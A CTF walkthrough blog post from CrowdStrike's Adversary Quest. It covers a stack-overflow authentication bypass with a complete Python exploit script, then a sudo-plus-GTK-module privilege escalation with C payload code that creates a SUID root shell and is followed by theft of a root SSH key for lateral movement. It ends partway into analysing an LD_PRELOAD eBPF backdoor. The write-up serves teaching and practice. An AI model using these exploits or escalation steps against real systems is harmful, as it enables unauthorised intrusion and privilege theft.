Adversary Quest Walkthrough, Part 3: Four PROTECTIVE PENGUIN Challenges

At the end of January 2021, the CrowdStrike Intelligence Advanced Research Team hosted our first-ever Adversary Quest. This “capture the flag” event featured 12 information security challenges in three different tracks: eCrime, Hacktivism and Targeted Intrusion. In the third track, Targeted Intrusion, players were pitted against the fictional adversary PROTECTIVE PENGUIN. Their objective was described as follows:

An Antarctica-based APT with a counterintelligence mission. Born out of the necessity to protect their Antarctic colonies from discovery, sentient wildlife has acquired the technology and skill set that allows PROTECTIVE PENGUIN to target research institutes, cruise lines and satellite imagery providers.

Part 1 of this three-part blog series covered the challenges in the eCrime track, and Part 2 covered the challenges in the Hacktivism track. This blog, Part 3, provides a walkthrough of the four challenges in the Targeted Intrusion track: Portal, Dactyls Tule Box, Egg Hunt and Exfiltrat0r.

Challenge 1: Portal

The PROTECTIVE PENGUIN track started off with the following challenge:

PROTECTIVE PENGUIN gained access to one of their victims through the victim’s extranet authentication portals and we were asked to investigate.

In order to investigate how the actor was able to gain access, we get an archive with the portal binary and a URL for a running instance of the portal. The task is to analyze the code of the web application locally and to eventually exploit the application remotely. The code can be unpacked as follows:

$ tar zxvf authportal.tar.gz 
authportal/
authportal/cgi-bin/
authportal/cgi-bin/portal.cgi  # CGI binary that validates entered
                               # credentials
authportal/index.html          # HTML file that posts entered credentials to
                               # /cgi-bin/portal.cgi
authportal/creds.txt           # valid credentials for the portal
authportal/run.sh              # script that starts a Python-based web server

A first analysis shows that the Bash script run.sh starts a Python-based CGI web server that serves the current working directory and runs executable files inside the cgi-bin directory when requested. The HTML document index.html renders a form that takes a username and a password and sends the input via HTTP POST to /cgi-bin/portal.cgi. When observing the behavior of the portal, one can assume that the CGI binary portal.cgi (ELF x86-64) verifies the entered credentials against a list of valid credentials that is stored in creds.txt: If valid credentials from creds.txt are supplied, the flag CS{foobar} is displayed. Of course, that is just a dummy flag and the credentials from creds.txt do not work remotely. This leaves the player with one promising lead to follow: to reverse engineer and exploit the portal.cgi binary.

The main function at address 0x401434 can be analyzed easily with the help of a decompiler. The generated pseudocode reveals the following points:

  • The expected request method seems to be POST (which is consistent with how the JavaScript inside index.html interacts with portal.cgi).
  • The expected Content-Type seems to be application/json (also consistent with what we know from index.html).
  • The HTTP request body is expected to be a JSON object with the key/value pairs user and pass:
    {"user": "entered username", "pass": "entered password"}
  • The function sub_401226 (which is called at address 0x40164A) takes two const char pointers as arguments that point to the values of user and pass. If the function returns 0, the CGI binary sends a JSON response that includes the flag (which will eventually get rendered by index.html). Otherwise, the JSON response is used to indicate an error.
  • The flag is retrieved from the environment variable FLAG.

The fact that the vulnerable binary is capable of printing the flag is a good indication that you likely do not need to execute your own code in order to complete this challenge. As a next step, the function sub_401226 (which was dubbed verify_creds) was decompiled for further analysis. The pseudocode is shown below:

__int64 __fastcall verify_creds(const char *username, const char *password)
{
  size_t tmp_strlen; // rax
  FILE *stream; // [rsp+10h] [rbp-230h]
  size_t strlen_candidate; // [rsp+18h] [rbp-228h]
  unsigned int creds_invalid; // [rsp+20h] [rbp-220h] OVERLAPPED BYREF
  char stored_creds_line[256]; // [rsp+24h] [rbp-21Ch] BYREF
  char input_creds_line[260]; // [rsp+124h] [rbp-11Ch] BYREF
  char *filename; // [rsp+228h] [rbp-18h]
  unsigned __int64 stack_cookie; // [rsp+238h] [rbp-8h]

  stack_cookie = __readfsqword(0x28u);
  memset(&creds_invalid, 0, 0x210uLL);
  creds_invalid = 1;
  filename = "creds.txt";
  __b64_pton(username, (u_char *)input_creds_line, 256uLL);
  *(_WORD *)&input_creds_line[strlen(input_creds_line)] = ':';
  tmp_strlen = strlen(input_creds_line);
  __b64_pton(password, (u_char *)&input_creds_line[tmp_strlen], 256uLL);
  stream = fopen(filename, "r");
  if ( !stream )
    return 0xFFFFFFFFLL;
  while ( fgets(stored_creds_line, 256, stream) )
  {
    strlen_candidate = strlen(stored_creds_line);
    if ( strchr(stored_creds_line, ':') )
    {
      if ( strlen_candidate )
      {
        if ( stored_creds_line[strlen_candidate - 1] == '\n' )
          stored_creds_line[strlen_candidate - 1] = 0;
      }
      if ( !strcmp(input_creds_line, stored_creds_line) )
      {
        creds_invalid = 0;
        break;
      }
    }
  }
  fclose(stream);
  return creds_invalid;
}

At the very beginning of the function, the stack variable char *filename is set to the address of the string creds.txt. This file stores a list of valid credentials. Next, the two arguments of the function, username and password, are Base64-decoded using the GNU C library function __b64_pton(). The decoded values are stored in the stack-allocated character array input_creds_line, separated by a colon (“:”), e.g., <decoded username>:<decoded password>. Afterward, fopen() is used to open the credential file. Each line of the file is then compared to the user-supplied credentials if it contains a colon. In case of a match, the function returns 0, signaling that the user supplied valid credentials. Otherwise, 1 is returned.

It was noticed that decoding the second parameter can overflow the stack-based buffer input_creds_line, which has a size of 260 bytes. During the first invocation of __b64_pton(), when decoding the username, up to 256 bytes may be written. Subsequently, a colon (“:”) is appended, which increases the buffer utilization to 257 bytes in the worst case. Regardless of the space that is already used for storing the username and the colon, the second invocation of __b64_pton() to decode the supplied password will then write up to 256 bytes beyond the colon. In other words, up to 253 bytes may get written beyond the designated target buffer input_creds_line (260 - 257 - 256 = -253).
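The worst-case arithmetic can be restated as a short calculation. This is only a sketch of the numbers given above; the constant names are made up for illustration and do not appear in the binary.

```python
# Sizes taken from the decompiled verify_creds() shown earlier.
BUF_SIZE = 260      # sizeof(input_creds_line)
MAX_DECODE = 256    # target size passed to each __b64_pton() call

# Worst case: the username fills all 256 bytes, then ':' is appended.
used_before_password = MAX_DECODE + 1

# The second decode may write another 256 bytes starting right after the colon.
worst_case_end = used_before_password + MAX_DECODE

overflow = worst_case_end - BUF_SIZE
print(f"bytes written past input_creds_line: {overflow}")
```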

Unfortunately, the function makes use of a stack cookie, and byte-wise brute forcing its 64-bit value is not an option either, as the target is not a forking server. Therefore, exploiting the program by overwriting the return address becomes infeasible.

Revisiting the stack layout of the function, it becomes clear that the filename pointer, which points to creds.txt, is adjacent to the end of the input_creds_line buffer. This would make a perfect target to be overwritten. In fact, it is the only reasonable target in our situation, as the filename pointer is located just below the stack cookie, and overwriting the cookie would result in program termination. If we can overwrite the filename pointer, we can choose our own credentials file and thereby bypass authentication. But in order to do that, we need the address of a string that qualifies as a valid file path. Further, the file must exist and needs to contain a known value matching the expected <username>:<password> pattern. It is assumed that ASLR is enabled on the remote system, so the only known addresses are those of the loaded segments of the CGI binary itself, which was not compiled as a position-independent executable. When examining the strings contained in the binary, only one absolute file path is found. It is the path of the dynamic linker, /lib64/ld-linux-x86-64.so.2, which is located at address 0x4002A8. All other strings would be interpreted as files relative to the current working directory, and those are highly unlikely to exist.
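The distances involved can be derived directly from the rbp-relative offsets that the decompiler annotated next to each variable. The following is a minimal sketch; the dictionary and the helper name distance are illustrative only.

```python
# rbp-relative offsets copied from the decompiler's variable annotations.
RBP_OFF = {
    "input_creds_line": -0x11C,
    "filename": -0x18,
    "stack_cookie": -0x08,
}

def distance(src: str, dst: str) -> int:
    """Number of bytes between the start of `src` and the start of `dst`."""
    return RBP_OFF[dst] - RBP_OFF[src]

to_filename = distance("input_creds_line", "filename")
to_cookie = distance("input_creds_line", "stack_cookie")

print(f"bytes before filename is reached:   {to_filename}")
print(f"bytes before the cookie is reached: {to_cookie}")
# Writing the 8-byte pointer ends before the cookie starts.
print(f"bytes written for a pointer overwrite: {to_filename + 8}")
```

With these offsets, a write that ends right after the 8-byte pointer stays below the cookie, which is why the pointer can be replaced without tripping the stack protector.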

When looking at the dynamic linker of an Ubuntu 20.04 installation, it becomes apparent that this file contains the required pattern numerous times. Most occurrences of the pattern are related to debug or error message format strings, such as the example below:

$ sha256sum /lib64/ld-linux-x86-64.so.2
96493303ba8ba364a8da6b77fbb9f04d0f170cbecbc6bbacca616161bd0f0008  /lib64/ld-linux-x86-64.so.2
$ xxd /lib64/ld-linux-x86-64.so.2 | grep 000257f0 -A 2
000257f0: 2f64 6c2d 7275 6e74 696d 652e 6300 0a63  /dl-runtime.c..c
00025800: 616c 6c69 6e67 2069 6e69 743a 2025 730a  alling init: %s.
00025810: 0a00 0a63 616c 6c69 6e67 2070 7265 696e  ...calling prein

The same format strings were identified in the dynamic linker binary that is shipped with Fedora 33. Thus, it was concluded that these strings are unlikely to change across distributions and that they likely exist on the target machine as well.
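To check which strings in a given file would be accepted as credential lines, the read loop of verify_creds() can be approximated in Python. This is a sketch under the assumption that the loop behaves as the decompiled code suggests (fgets() with a 256-byte buffer, strlen() stopping at the first null byte, colon check, newline stripping); the function name candidate_lines is hypothetical, and the sample bytes are taken from the xxd excerpt above.

```python
def candidate_lines(data: bytes, bufsize: int = 256):
    """Yield the strings that verify_creds() would compare against."""
    limit = bufsize - 1  # fgets() stores at most bufsize-1 bytes plus a NUL
    pos = 0
    while pos < len(data):
        # fgets() stops after a newline or once the buffer is full.
        nl = data.find(b"\n", pos, pos + limit)
        end = nl + 1 if nl != -1 else min(pos + limit, len(data))
        chunk = data[pos:end]
        pos = end
        # strlen()/strchr()/strcmp() only see bytes up to the first NUL.
        line = chunk.split(b"\x00", 1)[0]
        if b":" not in line:
            continue
        if line.endswith(b"\n"):
            line = line[:-1]
        yield line

# Bytes around offset 0x257f0 of the dynamic linker, as shown in the hex dump.
sample = b"/dl-runtime.c\x00\ncalling init: %s\n\n\x00\ncalling prein"
print(list(candidate_lines(sample)))
```

Running the same function over the full contents of a local copy of the dynamic linker would list every string that could serve as a username and password pair.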

One last challenge that we need to address is the fact that we need to supply a “valid” combination of username and password from the dynamic linker, while at the same time we need to trigger the overflow. This can be accomplished by supplying the Base64-encoded counterparts of “calling init” and “ %s\x00<padding><address of dynamic linker>” as username and password. When the colon-separated credential line is prepared in memory, the second __b64_pton() invocation will overwrite the filename pointer with the address of the path to the dynamic linker. At the same time, the prepared credential line will be terminated early by the inserted null byte. Thus, the final strcmp(), which compares the prepared credential line against all candidates from the dynamic linker, will stop early as well, and the decoded bytes after the null byte will not be taken into account for the comparison. After the comparison succeeds, the CGI binary should send the flag as part of the HTTP response. The process was automated in a Python script:

$ ./portal-exploit.py https://authportal.challenges.adversary.zone:8880/
 {"status": "success", "flag": "CS{w3b_vPn_h4xx}"}

The script code is shown below:

#!/usr/bin/env python3

import argparse
from base64 import b64encode
import requests
import struct
from urllib.parse import urljoin

def p64(n):
    return struct.pack('<Q', n)

def pwn(baseurl):
    # LOAD:00000000004002A8 aLib64LdLinuxX8 db '/lib64/ld-linux-x86-64.so.2',0
    dyn_linker_addr = 0x4002a8

    username = b'calling init'
    password = bytearray()
    password.extend(b' %s\x00')
    # The buffer size/distance to *filename is 260 bytes. We subtract
    # - the size of the username,
    # - one byte for the colon and
    # - the size of the null-terminated password.
    # The difference is the size of the padding that is needed to
    # overwrite *filename.
    pad_size = 260 - len(username) - 1 - len(password)
    password.extend(b'A'*pad_size)
    password.extend(p64(dyn_linker_addr))

    username_enc = b64encode(username).decode()
    password_enc = b64encode(password).decode()

    creds = {
        'user': username_enc,
        'pass': password_enc,
    }
    s = requests.Session()
    url = urljoin(baseurl, '/cgi-bin/portal.cgi')
    r = s.post(url, json=creds)
    print(r, r.text)

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('url')
    args = parser.parse_args()
    pwn(args.url)

if __name__ == '__main__':
    main()
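
The payload layout can be sanity-checked offline against a simplified model of the stack frame. The sketch below assumes that the filename pointer directly follows the 260-byte buffer, as the decompiler output indicates; the function simulate and the placeholder pointer value are hypothetical and only serve the illustration.

```python
import struct

BUF_SIZE = 260               # sizeof(input_creds_line)
DYN_LINKER_ADDR = 0x4002A8   # address of the ld.so path string in portal.cgi

def simulate(username: bytes, password: bytes):
    """Model input_creds_line followed directly by the filename pointer."""
    frame = bytearray(BUF_SIZE + 8)
    frame[BUF_SIZE:] = struct.pack("<Q", 0xDEADBEEF)  # stand-in for &"creds.txt"

    # First decode, then the colon (stored together with a NUL terminator).
    frame[:len(username)] = username
    pos = len(username)
    frame[pos:pos + 2] = b":\x00"
    pos += 1

    # The second decode starts after the colon and ignores the buffer's end.
    frame[pos:pos + len(password)] = password

    line = bytes(frame[:BUF_SIZE]).split(b"\x00", 1)[0]  # what strcmp() sees
    filename_ptr = struct.unpack_from("<Q", frame, BUF_SIZE)[0]
    return line, filename_ptr

username = b"calling init"
password = b" %s\x00"
password += b"A" * (BUF_SIZE - len(username) - 1 - len(password))
password += struct.pack("<Q", DYN_LINKER_ADDR)

line, filename_ptr = simulate(username, password)
print(line, hex(filename_ptr))
```

In this model, the compared string ends at the embedded null byte, while the trailing eight bytes of the password land exactly on the pointer.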

Challenge 2: Dactyls Tule Box

In Challenge 2, our fictional adversary PROTECTIVE PENGUIN has compromised a company:

We just received another report that PROTECTIVE PENGUIN was identified at a company that provides access to mapping software as a service. The adversary allegedly elevated privileges and then moved laterally to a backup server.

We were provided with a Virtual Machine Image of the mapping service. Can you analyze the image and reproduce the attack? If you think you’ve got it, the victim let us stand up an exact replica of their environment so that you can validate your results:

You can SSH as user customer01 to maps-as-a-service.challenges.adversary.zone on port 4141 using the following SSH private key: 

-----BEGIN OPENSSH PRIVATE KEY-----
[...]
-----END OPENSSH PRIVATE KEY-----

In this challenge, we are supposed to reproduce an alleged privilege escalation. We are given a virtual machine image for analysis and SSH credentials for a remote system.

To start our analysis, we unpack the downloaded virtual machine image by using gzip -d adversary-quest-mapviewer.qcow2.gz and then set up a new VM in virt-manager with the unpacked QCOW2 image as the hard drive. Next, we copy the SSH private key into a file called key and change the permissions to 600 so that read and write operations are limited to the user that owns the file. If the permissions are too wide, the OpenSSH client will refuse to use the file and instead urge the user to change permissions. Once our local VM is up and running, we can SSH into it for the first time:

$ ssh -i key -p 4141 customer01@192.168.122.189
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-62-generic x86_64)
[...]
customer01@maps-as-a-service:~$ uname -a
Linux maps-as-a-service 5.4.0-62-generic #70-Ubuntu SMP Tue Jan 12 12:45:47 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
customer01@maps-as-a-service:~$ cat /etc/os-release 
NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.1 LTS"
VERSION_ID="20.04"
[...]

Some initial reconnaissance suggests that this is an Ubuntu 20.04 LTS system running on a recently compiled kernel. While privilege escalation can happen in countless different ways, some types occur more often than others. The more frequent routes are the following:

  • Exploitation of a SUID/SGID binary
  • Exploitation of a binary you may execute through sudo
  • Privileged files being writable by unprivileged users
  • Exploitation of local services (e.g., loopback-bound or UNIX sockets)
  • Exploitation of the kernel

The hunt for SUID and SGID binaries did not yield any suspicious or custom binaries. All of them seem to be included in Ubuntu’s default repositories, and the challenge VM is pretty much up-to-date. It is unlikely that capture-the-flag players are supposed to find an undisclosed vulnerability in the stock SUID/SGID binaries. Note that the heap-based buffer overflow vulnerability in sudo (CVE-2021-3156) was still under embargo when the challenge was published.
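A hunt like this can be scripted in a few lines. The following is a minimal sketch of one way to enumerate SUID and SGID files, not necessarily the approach used during the analysis; the function name find_setid_files is hypothetical.

```python
import os
import stat

def find_setid_files(root: str):
    """Yield (path, mode string) for regular files below root with SUID or SGID set."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished file
            is_setid = st.st_mode & (stat.S_ISUID | stat.S_ISGID)
            if stat.S_ISREG(st.st_mode) and is_setid:
                yield path, stat.filemode(st.st_mode)
```

Calling find_setid_files("/") and comparing the results against the package database would then show whether any of the binaries fall outside the distribution's default packages.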

Next, we check whether there are any commands that sudo would let us execute as another user. To do so, we invoke sudo -ll, which prints the following:

customer01@maps-as-a-service:~$ sudo -ll
Matching Defaults entries for customer01 on maps-as-a-service:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User customer01 may run the following commands on maps-as-a-service:

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	/usr/local/bin/mapviewer

This tells us that we are allowed to execute the binary /usr/local/bin/mapviewer via sudo as root without authentication. The fact that the binary resides below /usr/local is a strong indication that it is custom-made and does not originate from a default Ubuntu package. Furthermore, the name of the binary, mapviewer, aligns with the description of the challenge. When we try to start it, we see an error message that indicates that the connection to the X server has failed and that we therefore do not see a GUI.

customer01@maps-as-a-service:~$ sudo mapviewer
Unable to init server: Could not connect: Connection refused

(mapviewer:3026): Gtk-WARNING **: 14:14:13.802: cannot open display:

This confirms that we in fact have permission to run mapviewer as root. Furthermore, the error message tells us that the binary is GTK-based. If we can exploit this binary and make it run our own code, it would also get executed as root. Typical avenues for passing malicious input to a vulnerable program to exploit it include standard input (stdin), environment variables, command line arguments, sockets, malicious GUI interactions and shared library search order hijacking.

When inspecting the binary, it becomes apparent that the application links against osm-gps-map, a Gtk+ widget for displaying OpenStreetMap and Google Maps tiles. Most of the mapviewer code seems to originate from an example application with the same name that is provided by the osm-gps-map project. Such code overlaps greatly help reduce time-consuming reverse engineering efforts. We can see that mapviewer does not read input from stdin and that it does not contain any networking code. Therefore, we can rule out stdin and network sockets as ways for passing malicious input. From the env_reset flag in the sudo -ll output, we know that sudo will not allow us to pass a custom environment to mapviewer. This leaves us with shared object search order hijacking, malicious GUI interactions and malicious command-line arguments as possible attack vectors that we still need to check.

One convenient way to gain visibility into the shared object search order is to use the tool strace on the target binary. By monitoring system calls related to file accesses, we should be able to spot a vulnerable search order easily. As we have a local copy of the VM, we can simply grant ourselves the right to execute strace as root for testing purposes by appending the line customer01 ALL=(ALL) NOPASSWD: ALL to the file /etc/sudoers.d/10-mapviewer. The following listing shows the invocation of mapviewer via strace:

customer01@maps-as-a-service:~$ sudo strace -e file mapviewer
execve("/usr/local/bin/mapviewer", ["mapviewer"], 0x7ffff7d34c20 /* 24 vars */) = 0
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/local/lib/tls/haswell/x86_64/libgthread-2.0.so.0", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
[...]

Unfortunately, all attempts to access shared objects, successful or not, referenced file paths that are not writable by unprivileged users. This outcome is not much of a surprise, as by default Ubuntu 19.10 and newer no longer preserve the HOME environment variable when using sudo. Thus, the likelihood of searching the unprivileged user’s home directory for shared objects while executing as root has been reduced.
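Reviewing a long strace log by hand is tedious, so the check can be partly automated. The sketch below extracts the probed paths from strace -e file output and reports directories that the current user could write to; the function names are hypothetical, and the regular expression only covers the call formats visible in the listing above.

```python
import os
import re

# Matches the path argument of openat/open/access lines as printed by strace.
PATH_RE = re.compile(r'^(?:openat\(AT_FDCWD, |open\(|access\()"([^"]+)"')

def probed_paths(strace_output: str):
    """Extract file paths from open/openat/access lines of strace output."""
    paths = []
    for line in strace_output.splitlines():
        match = PATH_RE.match(line)
        if match:
            paths.append(match.group(1))
    return paths

def writable_dirs(paths):
    """Return existing directories of probed paths that we may write to."""
    dirs = {os.path.dirname(p) for p in paths}
    return sorted(d for d in dirs if os.path.isdir(d) and os.access(d, os.W_OK))
```

The check has to be run as the unprivileged user to be meaningful. Note that this simplification ignores missing directories whose parent is writable, which would need a separate check.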

In order to check for malicious GUI interactions, an X11-enabled SSH session to the local VM was established and mapviewer was started as an unprivileged user:

$ ssh -i key -p 4141 -X customer01@192.168.122.189
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-62-generic x86_64)
[...]
customer01@maps-as-a-service:~$ mapviewer
[...]

The user interface of mapviewer is shown in the following screenshot. Users can scroll the map, zoom in and out, and place marks on the map. Other than that, there does not appear to be any dangerous functionality implemented — an estimate that is also backed by our code analysis and reverse engineering efforts so far.

The last item on our list of potential attack vectors is malicious command-line arguments. mapviewer does not advertise any command-line arguments that would obviously present a security risk:

customer01@maps-as-a-service:~$ mapviewer --help
Usage:
  mapviewer [OPTION…] - Map browser

Options:
  -n, --no-cache            Disable cache
  -e, --editable-tracks     Make the tracks editable


Valid map sources:
	0:	None
	1:	OpenStreetMap I
[...]
	12:	Virtual Earth Hybrid

When compared to the mapviewer source code on GitHub, it becomes apparent that several command-line options present in the GitHub version have even been removed. However, mapviewer is a GTK application. According to the GTK documentation, GTK applications implicitly accept a set of GTK-specific command-line arguments:

All GTK+ applications support a number of standard commandline options. These are removed from argv by gtk_init(). Modules may parse and remove further options. The X11 and Windows GDK backends parse some additional commandline options.

--gtk-module module. A list of modules to load in addition to those specified in the GTK3_MODULES environment variable and the gtk-modules setting.

The --gtk-module option looks particularly interesting as it should allow us to load our own malicious module in the privileged mapviewer process. At this point, we have two options: We can either read up on the GTK documentation and build a valid GTK module, or we can ignore the GTK-specific requirements for modules and take a shortcut. We took the shortcut, which, by coincidence, is even universally applicable to dynamically linked binaries: By marking our payload function with the constructor attribute, we can instruct the dynamic loader to execute our payload once it loads our library and before control flow is passed to any GTK-specific loader code. The following code implements our payload, which creates a root-owned SUID-enabled copy of bash as a simple way of persisting our root privileges.

#include <stdio.h>   /* puts() */
#include <unistd.h>  /* execve() */

__attribute__((constructor))
void pwn()
{
	char *argv[] = {
		"/bin/bash",
		"-p",
		"-c",
		"cp /bin/bash /bin/bash2; chmod +s /bin/bash2",
		NULL
	};

	puts("Trying to create suid-enabled /bin/bash2...");
	execve("/bin/bash", argv, NULL);
}

The code can be compiled as follows:

$ gcc -shared -fPIC -o /tmp/pwn.so pwn.c

When executing mapviewer with --gtk-module option, we gain root privileges even before GTK has a chance to complain about a missing X11 connection or our module not adhering to GTK-specific module requirements:

customer01@maps-as-a-service:~$ sudo mapviewer --gtk-module /tmp/pwn.so
Trying to create suid-enabled /bin/bash2...
customer01@maps-as-a-service:~$ ls -la /bin/bash2
-rwsr-sr-x 1 root root 1183448 Mar 15 14:37 /bin/bash2
customer01@maps-as-a-service:~$ bash2 -p
bash2-5.0# id
uid=1001(customer01) gid=1001(customer01) euid=0(root) egid=0(root) groups=0(root),1001(customer01)

We can use these privileges to read the SSH private key of the root user and the corresponding known_hosts file:

bash2-5.0# cat /root/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAFLrooVaQm4+u+uB4sHmJTcMn0IFFW5ac8qo/yIlgJ6AAAAKCMRPvrjET7
6wAAAAtzc2gtZWQyNTUxOQAAACAFLrooVaQm4+u+uB4sHmJTcMn0IFFW5ac8qo/yIlgJ6A
AAAED7UEgIa0dLauEO+obZLKUO9DTvUrUZskHUawW1KF1wpAUuuihVpCbj6764HiweYlNw
yfQgUVblpzyqj/IiWAnoAAAAFnJvb3RAbWFwcy1hcy1hLXNlcnZpY2UBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----
bash2-5.0# cat /root/.ssh/known_hosts 
maps-backups.challenges.adversary.zone ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAaIwWWA8y9cIT5MfnbJ0x91Smgi6Zzf7D56u4Hr94Qd/toffdAO3c5ajm7E7GjgBIQ4YVRTh28pRBuL7QCSnDo

From the known_hosts file, we learn that this machine had likely established an SSH connection to the host maps-backups.challenges.adversary.zone at least once in the past. With the newly obtained key downloaded and stored as id_ed25519_root, a connection to that host can be established successfully to retrieve the flag:

$ ssh -i id_ed25519_root backup@maps-backups.challenges.adversary.zone
[...]
CS{sudo_+_GTK_=_pwn}

Because of the security risks imposed by running GTK applications as root, GTK even prevents SUID- and SGID-enabled binaries from executing and terminates its own initialization, as shown below:

(process:50984): Gtk-WARNING **: 16:33:41.444: This process is currently running setuid or setgid.
This is not a supported use of GTK+. You must create a helper
program instead. For further details, see:

    http://www.gtk.org/setuid.html

Refusing to initialize GTK+.

As opposed to detecting a SUID or SGID context, detecting if a program was run via sudo is a much more involved task that cannot be accomplished easily. Thus, no warning or program termination occurs if GTK-linked programs such as mapviewer are run via sudo.
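The difference between the two situations can be illustrated with the process credentials involved. The following sketch shows the kind of comparison a SUID/SGID check can rely on; it is an assumption for illustration and not GTK's actual code, and the function name looks_setid is hypothetical.

```python
def looks_setid(ruid, euid, suid, rgid, egid, sgid) -> bool:
    """True if real, effective and saved IDs differ, as under a SUID/SGID binary."""
    return not (ruid == euid == suid and rgid == egid == sgid)

# SUID/SGID root binary started by customer01 (IDs as in the bash2 example above):
print(looks_setid(1001, 0, 0, 1001, 0, 0))

# The same program started through sudo: every ID is already 0 when it starts.
print(looks_setid(0, 0, 0, 0, 0, 0))
```

Under sudo, the process simply looks like a program started by root, so a comparison of this kind has nothing to detect.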

Challenge 3: Egg Hunt

The third challenge of the PROTECTIVE PENGUIN track is called “Egg Hunt.” The challenge description reads as follows:

After moving laterally, PROTECTIVE PENGUIN compromised a number of additional systems and gained persistence. We have identified another host in the DMZ that we believe was backdoored by the adversary and is used to regain access.

Please download a virtual machine image of that host and identify the backdoor. Validate your findings in our test environment on egghunt.challenges.adversary.zone.

The archive contains a shell script and a QCOW2 image, which can be unpacked as follows:

$ tar Jxvf egghunt.tar.xz 
egghunt/
egghunt/art_ctf_egghunt_local.qcow2
egghunt/run.sh

The shell script can be used to start a live snapshot of the VM and additionally forwards port 4422/tcp and 1337/udp from the host to the VM.

After starting the VM through the script, we are presented with an interactive shell. While looking for suspicious files, a shared object named libc.so.7 can be found in the directory /dev/shm/x86_64-linux-gnu:

root@egghunt:~# ls -la /dev/shm
total 0
drwxrwxrwt  3 root root   60 Jan 14 12:15 .
drwxr-xr-x 17 root root 3860 Jan 14 12:13 ..
drwxr-xr-x  2 root root   60 Jan 14 12:15 x86_64-linux-gnu
root@egghunt:~# ls -la /dev/shm/x86_64-linux-gnu/
total 252
drwxr-xr-x 2 root root     60 Jan 14 12:15 .
drwxrwxrwt 3 root root     60 Jan 14 12:15 ..
-rwxr-xr-x 1 root root 257416 Jan 14 12:15 libc.so.7
root@egghunt:~# file /dev/shm/x86_64-linux-gnu/libc.so.7
/dev/shm/x86_64-linux-gnu/libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped

/dev/shm is a temporary filesystem, and as such, its contents are not retained across reboots, which makes this a highly unusual and suspicious location to store a shared object file. Any application that requires the shared object in that directory would become inoperable after a reboot. Further, the dynamic linker of the vulnerable image does not even search for shared objects in /dev/shm/x86_64-linux-gnu. These observations further strengthen the assumption that this file is almost certainly not legitimate.

Executing lsof and grepping for the shared object’s name shows that it seems to be used by the cron process (pid 974):

root@egghunt:~# lsof | grep libc.so.7
cron       974       [...]  /dev/shm/x86_64-linux-gnu/libc.so.7

Further examination of cron’s environment variables shows that it has been injected into the process by using LD_PRELOAD:

root@egghunt:~# strings /proc/$(pidof cron)/environ
LD_PRELOAD=/dev/shm/x86_64-linux-gnu/libc.so.7
SHELL=/bin/bash
PWD=/root
LOGNAME=root
XDG_SESSION_TYPE=tty
[...]
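
The same check can be scripted to triage many processes at once. The sketch below parses the NUL-separated environment block that procfs exposes; the function names are hypothetical, and reading another process's environ file requires sufficient privileges.

```python
def parse_environ(raw: bytes) -> dict:
    """Split a /proc/<pid>/environ blob (NUL-separated KEY=VALUE) into a dict."""
    env = {}
    for entry in raw.split(b"\x00"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

def preloaded_objects(pid: int):
    """Return the LD_PRELOAD entries of a running process."""
    with open(f"/proc/{pid}/environ", "rb") as fh:
        env = parse_environ(fh.read())
    # The dynamic linker accepts spaces and colons as list separators.
    return env.get("LD_PRELOAD", "").replace(":", " ").split()
```

Keep in mind that the environ file reflects the environment at process start, so it shows what the dynamic linker saw when cron was launched.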

Listing the dynamic symbols of the shared object reveals that many of them are prefixed with the string bpf_.

root@egghunt:~# nm -D /dev/shm/x86_64-linux-gnu/libc.so.7 
                 U access@@GLIBC_2.2.5
0000000000020d40 T bpf_btf_get_fd_by_id
0000000000020ba0 T bpf_btf_get_next_id
000000000001f240 T bpf_create_map
000000000001f470 T bpf_create_map_in_map
000000000001f310 T bpf_create_map_in_map_node
000000000001f2b0 T bpf_create_map_name
000000000001f1c0 T bpf_create_map_node
000000000001f050 T bpf_create_map_xattr
00000000000210c0 T bpf_enable_stats
0000000000020570 T bpf_iter_create
0000000000020150 T bpf_link_create
00000000000187a0 T bpf_link__destroy
[...]

These symbols indicate that the shared object leverages eBPF functionality in one way or another. This is further confirmed by the fact that the shared object contains lines of debug and error messages related to libbpf, a “library for loading eBPF programs and reading and manipulating eBPF objects from user-space”:

root@egghunt:~# strings /dev/shm/x86_64-linux-gnu/libc.so.7 | grep libbpf
[...]
libbpf: prog '%s': relo #%d: target candidate search failed for [%d] %s %s: %ld
libbpf: prog '%s': relo #%d: error matching candidate #%d 
libbpf: prog '%s': relo #%d: %s candidate #%d 
libbpf: prog '%s': relo #%d: field offset ambiguity: %u != %u
libbpf: prog '%s': relo #%d: relocation decision ambiguity: %s %u != %s %u
libbpf: prog '%s': relo #%d: substituting insn #%d w/ invalid insn
libbpf: prog '%s': relo #%d: unexpected insn #%d (ALU/ALU64) value: got %u, exp %u -> %u
libbpf: prog '%s': relo #%d: patched insn #%d (ALU/ALU64) imm %u -> %u
libbpf: prog '%s': relo #%d: unexpected insn #%d (LDX/ST/STX) value: got %u, exp %u -> %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) value too big: %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) accesses field incorrectly. Make sure you are accessing pointers, unsigned integers, or fields of matching type and size.
